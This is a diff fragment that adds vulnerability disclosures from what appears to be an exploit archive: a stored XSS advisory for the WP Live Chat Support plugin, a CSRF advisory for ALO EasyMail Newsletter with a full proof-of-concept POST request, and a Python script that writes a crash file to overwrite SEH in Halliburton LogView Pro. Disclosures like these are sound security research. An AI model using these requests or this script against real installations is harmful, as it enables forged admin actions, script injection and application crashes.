+OVE-20160724-0010 + +Tested versions + +This issue was successfully tested on WP Live Chat Support WordPress Plugin version 6.2.03. + +Fix + +This issue is resolved in WP Live Chat Support version 6.2.04. + +Introduction + +WP Live Chat Support allows chatting with visitors of a WordPress site. A persistent Cross-Site Scripting vulnerability has been discovered in the WP Live Chat Support allowing an attacker to execute actions on behalf of a logged on WordPress user. A stored Cross-Site Scripting vulnerability was found in the WP Live Chat Support WordPress Plugin. This issue can be exploited by an unauthenticated user. It allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf. + +Details + +The vulnerability exists in the file wp-live-chat-support/functions.php (line 1233), which is called in the file wp-live-chat-support/wp-live-chat-support.php (line 602): + +wp-live-chat-support/wp-live-chat-support.php: + +600 if ($_POST['action'] == "wplc_user_send_offline_message") { +601 if(function_exists('wplc_send_offline_msg')){ wplc_send_offline_msg($_POST['name'], $_POST['email'], $_POST['msg'], $_POST['cid']); } +602 if(function_exists('wplc_store_offline_message')){ wplc_store_offline_message($_POST['name'], $_POST['email'], $_POST['msg']); } +603 do_action("wplc_hook_offline_message",array( +604 "cid"=>$_POST['cid'], +605 "name"=>$_POST['name'], +606 "email"=>$_POST['email'], +607 "url"=>get_site_url(), +608 "msg"=>$_POST['msg'] +609 ) +610 ); +611 } + +wp-live-chat-support/functions.php: + +1206 function wplc_store_offline_message($name, $email, $message){ +1207 global $wpdb; +1208 global $wplc_tblname_offline_msgs; +1209 +1210 $wplc_settings = get_option('WPLC_SETTINGS'); +1211 +1212 if(isset($wplc_settings['wplc_record_ip_address']) && $wplc_settings['wplc_record_ip_address'] == 1){ +1213 if(isset($_SERVER['HTTP_X_FORWARDED_FOR']) && $_SERVER['HTTP_X_FORWARDED_FOR'] != '') { +1214 $ip_address = $_SERVER['HTTP_X_FORWARDED_FOR']; +1215 } else { +1216 $ip_address = $_SERVER['REMOTE_ADDR']; +1217 } +1218 $offline_ip_address = $ip_address; +1219 } else { +1220 $offline_ip_address = ""; +1221 } +1222 +1223 +1224 $ins_array = array( +1225 'timestamp' => current_time('mysql'), +1226 'name' => $name, +1227 'email' => $email, +1228 'message' => $message, +1229 'ip' => $offline_ip_address, +1230 'user_agent' => $_SERVER['HTTP_USER_AGENT'] +1231 ); +1232 +1233 $rows_affected = $wpdb->insert( $wplc_tblname_offline_msgs, $ins_array ); +1234 return; +1235 } + +The vulnerability can be exploited using a specially crafted POST request. The victim needs view the WP Live Chat Offline Messages page to trigger the Cross-Site Scripting payload. It should be noted taht the offline message functionality is available even if there is a logged on chat user present. + +Proof of concept + +POST /wp-admin/admin-ajax.php HTTP/1.1 +Host: +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Content-Length: 361 +Connection: close + +action=wplc_user_send_offline_message&security=8d1fc19e30&cid=1&name=&email=Mail&msg= diff --git a/platforms/php/webapps/40191.txt b/platforms/php/webapps/40191.txt new file mode 100755 index 000000000..1808a96f8 --- /dev/null +++ b/platforms/php/webapps/40191.txt @@ -0,0 +1,83 @@ +Cross-Site Request Forgery in ALO EasyMail Newsletter WordPress Plugin + +Contact + +For feedback or questions about this advisory mail us at sumofpwn at securify.nl + +The Summer of Pwnage + +This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam. + +OVE ID +OVE-20160724-0021 + +Abstract + +It was discovered that the ALO EasyMail Newsletter WordPress Plugin is vulnerable to Cross-Site Request Forgery. Amongst others, this issue can be used to add/import arbitrary subscribers. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website/link. + +Tested versions + +This issue was successfully tested on ALO EasyMail Newsletter WordPress Plugin version 2.9.2. + +Fix + +This issue is resolved in ALO EasyMail Newsletter version 2.9.3. + +Introduction + +ALO EasyMail Newsletter is a plugin for WordPress that allows to write and send newsletters, and to gather and manage the subscribers. It supports internationalization and multilanguage. It was discovered that the ALO EasyMail Newsletter WordPress Plugin is vulnerable to Cross-Site Request Forgery. + +Details + +A number of actions within ALO EasyMail Newsletter consist of two steps. The 'step one' action is protected against Cross-Site Request Forgery by means of the check_admin_referer() WordPress function. + += '2.6.5') check_admin_referer('alo-easymail_subscribers'); + + +Amongst others, this issue can be used to add/import arbitrary subscribers. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website/link. + +Proof of concept + +POST /wp-admin/edit.php?post_type=newsletter&page=alo-easymail%2Fpages%2Falo-easymail-admin-subscribers.php&doaction_step2=true&action=import HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: +Connection: close +Content-Type: multipart/form-data; boundary=---------------------------17016644981835490787491067954 +Content-Length: 645 + +-----------------------------17016644981835490787491067954 +Content-Disposition: form-data; name="uploaded_csv"; filename="foo.csv" +Content-Type: text/plain + +sumofpwn@securify.n;Summer of Pwnage;en + +-----------------------------17016644981835490787491067954 +Content-Disposition: form-data; name="post_type" + +newsletter +-----------------------------17016644981835490787491067954 +Content-Disposition: form-data; name="action" + +import_step2 +-----------------------------17016644981835490787491067954 +Content-Disposition: form-data; name="doaction_step2" + +Upload CSV file +-----------------------------17016644981835490787491067954-- \ No newline at end of file diff --git a/platforms/windows/dos/40192.py b/platforms/windows/dos/40192.py new file mode 100755 index 000000000..785ea5380 --- /dev/null +++ b/platforms/windows/dos/40192.py @@ -0,0 +1,26 @@ +# Exploit Title: [Haliburton LogView Pro v9.7.5] +# Exploit Author: [Karn Ganeshen] +# Download link: [http://www.halliburton.com/public/lp/contents/Interactive_Tools/web/Toolkits/lp/Halliburton_Log_Viewer.exe] + +# Version: [Current version 9.7.5] +# Tested on: [Windows Vista Ultimate SP2] +# +# Open cgm/tif/tiff/tifh file -> program crash -> SEH overwritten +# +# SEH chain of main thread +# Address SE handler +# 0012D22C kernel32.76B6FEF9 +# 0012D8CC 42424242 +# 41414141 *** CORRUPT ENTRY *** +# + +#!/usr/bin/python + +file="evil.cgm" +buffer = "A"*804 + "B"*4 + +file = open(file, 'w') +file.write(buffer) +file.close() + +# +++++